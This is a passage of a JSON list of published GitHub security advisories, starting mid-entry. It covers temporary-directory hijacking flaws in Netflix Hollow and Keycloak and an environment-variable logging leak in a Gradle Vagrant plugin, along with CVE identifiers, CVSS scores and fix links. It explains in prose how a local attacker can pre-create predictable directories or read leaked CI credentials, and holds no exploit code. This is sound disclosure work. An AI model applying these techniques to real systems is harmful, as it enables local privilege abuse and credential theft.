calculated.\r\n\r\nhttps://github.com/Netflix/hollow/blob/eeefe2454ed2efce60b8971e1a02d8f7375ea7fb/hollow/src/main/java/com/netflix/hollow/api/producer/fs/HollowFilesystemBlobStager.java#L110\r\n\r\nAs such, an attacker is fully able to control both the contents of the files and directories that HollowFilesystemBlobStager operates on.\r\n\r\n---\r\n\r\nThe custom CodeQL queries leveraged to find these this as well as their results can be found here:\r\n\r\nhttps://lgtm.com/query/1543383251073929777/\r\nhttps://lgtm.com/query/3142895023158674709/\r\n\r\n## Official Disclosure\r\n\r\nhttps://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-001.md\r\n\r\n## Fixed Version\r\n\r\nThis vulnerability has not been patched.\r\n", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-j83w-7qr9-wv86", "type": "GHSA" }, { "value": "CVE-2021-28099", "type": "CVE" } ], "state": "published", "created_at": "2021-03-22T23:34:10Z", "updated_at": "2021-03-30T14:52:37Z", "published_at": "2021-03-30T14:52:37Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "com.netflix.hollow:hollow" }, "vulnerable_version_range": "All", "patched_versions": "None", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "score": 7.8 }, "cwes": [], "cwe_ids": [], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-7gf3-89f6-823j", "cve_id": "CVE-2021-20202", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-7gf3-89f6-823j", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-7gf3-89f6-823j", "summary": "Keycloak: Local Temporary Directory Hijacking Vulnerability", "description": "Utilizing a custom CodeQL query written as a part of the GitHub Security Lab Bug Bounty program, I've unearthed a local temporary directory hijacking vulnerability.\r\n\r\nThis particular vulnerability impacts Keycloak/keycloak\r\n\r\nYou can see the custom CodeQL query utilized here:\r\nhttps://lgtm.com/query/7674880310425951666/\r\n\r\nThis particular vulnerability exists because on unix-like systems (not including MacOS) the system temporary directory is shared between all users.\r\nAs such, failure to correctly set file permissions and/or verify exclusive creation of directories can lead to either local information disclosure, or local file hijacking by another user.\r\n\r\nIn the worse case scenario, this can lead to a local privilege escalation vulnerability, as it did in this vulnerability I disclosed in Jetty:\r\nhttps://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6\r\n\r\nIn this case, it does not look like code is explicitly intended to be written to these directories. However, it does look like the GzipResourceEncodingProviderFactory.java is used as the creator of a cache. Thus, a malicious user can perform cache poisoning.\r\n\r\nAdditionally, DirExportProvider.java looks like it's being used to export information. This information can be corrupted by a different user.\r\n\r\nOne of many root causes here is that `mkdir` and `mkdirs` do not fail if the directory already exists. They merely return `false`. As such, an attacker can create these directories before the java process creates them, but with wider user permissions. Since these directory names are not in any way random, the attacker can simply create these directories ahead of Keycloak. When this happens, the java process doesn't complain that the directories already exist, `mkdir` and `mkdirs` simply return false.\r\n\r\nHowever, assuming that the java process is the first thing to create these directories, `mkdir` and `mkdirs` will only set the directory following the default umask (I believe); by default that means that these directories are created with the permissions `drwxr-xr-x`.\r\nThus allowing a malicious local user to read the contents of this temporary directory.\r\n\r\n## Official Disclosure\r\n\r\nhttps://access.redhat.com/security/cve/cve-2021-20202\r\n\r\n## Official Fix\r\nhttps://github.com/keycloak/keycloak/pull/7859/files", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-7gf3-89f6-823j", "type": "GHSA" }, { "value": "CVE-2021-20202", "type": "CVE" } ], "state": "published", "created_at": "2021-03-16T14:47:16Z", "updated_at": "2021-12-22T20:26:37Z", "published_at": "2021-12-22T20:26:37Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "org.keycloak:keycloak-services" }, "vulnerable_version_range": "12.0.0 < 13.0.0", "patched_versions": "13.0.0", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "score": 6.3 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" } ], "cwe_ids": [ "CWE-377" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-jpcm-4485-69p7", "cve_id": "CVE-2021-21361", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-jpcm-4485-69p7", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-jpcm-4485-69p7", "summary": "Sensitive information disclosure via log in com.bmuschko:gradle-vagrant-plugin", "description": "### Impact\r\n\r\nThe `com.bmuschko:gradle-vagrant-plugin` Gradle plugin contains an information disclosure vulnerability due to the logging of the system environment variables.\r\n\r\nWhen this Gradle plugin is executed in public CI/CD, this can lead to sensitive credentials being exposed to malicious actors.\r\n\r\n### Patches\r\nFixed in version 3.0.0\r\n\r\n### References\r\n\r\n - https://github.com/bmuschko/gradle-vagrant-plugin/blob/292129f9343d00d391543fae06239e9b0f33db73/src/main/groovy/com/bmuschko/gradle/vagrant/process/GDKExternalProcessExecutor.groovy#L42-L44\r\n - https://github.com/bmuschko/gradle-vagrant-plugin/issues/19\r\n - https://github.com/bmuschko/gradle-vagrant-plugin/pull/20\r\n\r\n### For more information\r\n\r\nIf you have any questions or comments about this advisory:\r\n* Open an issue in [bmuschko/gradle-vagrant-plugin](https://github.com/bmuschko/gradle-vagrant-plugin)\r\n\r\n", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-jpcm-4485-69p7", "type": "GHSA" }, { "value": "CVE-2021-21361", "type": "CVE" } ], "state": "published", "created_at": "2021-03-01T14:48:05Z", "updated_at": "2021-03-12T16:10:55Z", "published_at": "2021-03-08T17:44:33Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "com.bmuschko:gradle-vagrant-plugin" }, "vulnerable_version_range": "0.6<, < 3.0.0", "patched_versions": "3.0.0", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "score": 7.4 }, "cwes": [ { "cwe_id": "CWE-532", "name": "Insertion of Sensitive Information into Log File" }, { "cwe_id": "CWE-779", "name": "Logging of Excessive Data" } ], "cwe_ids": [ "CWE-532", "CWE-779" ], "credits": [ { "login": "britter", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "britter", "id": 1327662, "node_id": "MDQ6VXNlcjEzMjc2NjI=", "avatar_url": "https://avatars.githubusercontent.com/u/1327662?v=4", "gravatar_id": "", "url": "https://api.github.com/users/britter", "html_url": "https://github.com/britter", "followers_url": "https://api.github.com/users/britter/followers", "following_url": "https://api.github.com/users/britter/following{/other_user}", "gists_url": "https://api.github.com/users/britter/gists{/gist_id}", "starred_url": "https://api.github.com/users/britter/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/britter/subscriptions", "organizations_url": "https://api.github.com/users/britter/orgs", "repos_url": "https://api.github.com/users/britter/repos", "events_url": "https://api.github.com/users/britter/events{/privacy}", "received_events_url": "https://api.github.com/users/britter/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] } ]
|
